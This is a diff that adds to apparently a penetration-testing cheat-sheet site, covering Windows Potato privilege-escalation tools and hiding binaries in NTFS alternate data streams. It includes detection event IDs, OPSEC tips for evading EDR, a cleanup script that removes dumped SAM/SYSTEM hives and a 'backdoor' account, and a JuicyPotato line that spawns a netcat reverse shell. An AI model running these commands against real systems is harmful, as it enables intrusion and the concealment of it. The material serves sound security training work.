+| `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment |
+| `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 |
+| Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) |
+| Files/EXEs written to `C:\Windows\Temp`, spooler dirs; new `$DATA` streams | Sysmon Event 11; `Get-Item -Stream *`, `streams.exe`, `dir /r` |
+| A downloaded tool's `Zone.Identifier` still naming your web server | ADS on the artefact |
+
+**OPSEC notes:**
+
+- Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account.
+- `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk.
+- ADS defeats a `dir` and a size check, not a defender who runs `dir /r` / `streams.exe` — treat it as *reduces casual visibility*, not *invisible*.
+
+**Cleanup checklist:**
+
+```powershell
+Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue
+Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue
+Remove-Item C:\Windows\Temp\log.txt -Stream g.exe -ErrorAction SilentlyContinue # the ADS
+net user backdoor /del 2>$null # if you created one
+```
+
+---
+
+## References `fas:BookOpen`
+
+| Tool / topic | Source |
+|---|---|
+| PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) |
+| GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) |
+| JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) |
+| JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) |
+| RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) |
+| EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) |
+| SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) |
+| The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) |
+| NTFS ADS / Mark-of-the-Web | [MITRE ATT&CK T1564.004](https://attack.mitre.org/techniques/T1564/004/) · [Sysinternals streams](https://learn.microsoft.com/sysinternals/downloads/streams) |
+
+---
+
+[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide →](/sheets/privilege-escalation/windows-privesc)
+\ No newline at end of file
diff --git a/src/content/sheets/pentest-workflow/windows-privesc-cpts.md b/src/content/sheets/pentest-workflow/windows-privesc-cpts.md
@@ -175,6 +175,7 @@ JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 1
> 3. **RoguePotato** — legacy OXID resolver trick for when outbound DCOM to your listener is blocked (needs a redirector on port 135).
> 4. **JuicyPotato** — legacy, dead ≥ Server 2019 / Win10 1809 (DCOM hardening); keep for 2016-and-older targets.
> Catch callbacks with `nc -lnvp 8443`.
+> Full walk-through — every flag for PrintSpoofer / GodPotato / JuicyPotatoNG / RoguePotato / EfsPotato / SweetPotato, delivery from MSSQL/IIS/WinRM, and hiding the kit in an ADS: [Potato Attacks & ADS guide](/sheets/pentest-workflow/potato-attacks-and-ads-guide).
**`SeDebugPrivilege` → dump LSASS / steal a SYSTEM token:**
```batch